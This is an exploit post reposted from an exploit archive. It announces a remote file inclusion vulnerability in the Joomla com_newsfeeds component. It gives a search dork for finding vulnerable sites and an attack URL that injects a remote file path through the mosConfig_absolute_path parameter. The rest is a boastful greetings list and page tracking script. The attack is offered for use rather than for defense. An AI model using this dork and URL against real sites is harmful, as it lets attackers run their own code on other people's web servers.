Joomla Component com_newsfeeds RFI Vulnerability
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_newsfeeds RFI Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
Joomla Component com_newsfeeds RFI Vulnerability
================================================
[?] My h0m3: [http://HaCkTeCh.Org/cc& Pal-Li0n.som ]
[?] F0r 4sk: [F5w@hotmail.com ]
[?] 5cr1p7: [ joomla ]
[?] h0m3 5cr1p7 [ http://www.joomla.com ]
[?] L4nguage: [ PHP ]
[?] F0und3r: [ Li0n-PaL ]
[?] D0rK : [ intrul:index.php?option=com_newsfeeds ]
===[ Expl0it ]===
RFI #~
http://localhost//index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=[RFI]
EnJoY o_O
———————————————————
[?] Gr44tz to:[ Pal-Li0n-[PaL-Li0ns.com]Red-D3v1L-ShaDow-D3v1L-j0rd4n14n.r1z[sec-r1z.com]-Sas-TerrOrisT-Cold z3ro-zAx-SarBot511-Devil Fucker-
Storm-HcJ-ViRuSMaN-VirUs_Hima-PaL-D3v1L-Mr.Safa7-Evil-Cod3r [v4-team]-h3ll c0d3-Mahmoud SQL[Team-SQL.com]-D4rk-Mr.Sc0rpion-All
HacKTeacH.Org MeMbers & Gusts & CreW]
========================
./Li0n-PaL
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-06-30]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13078
Leave a Reply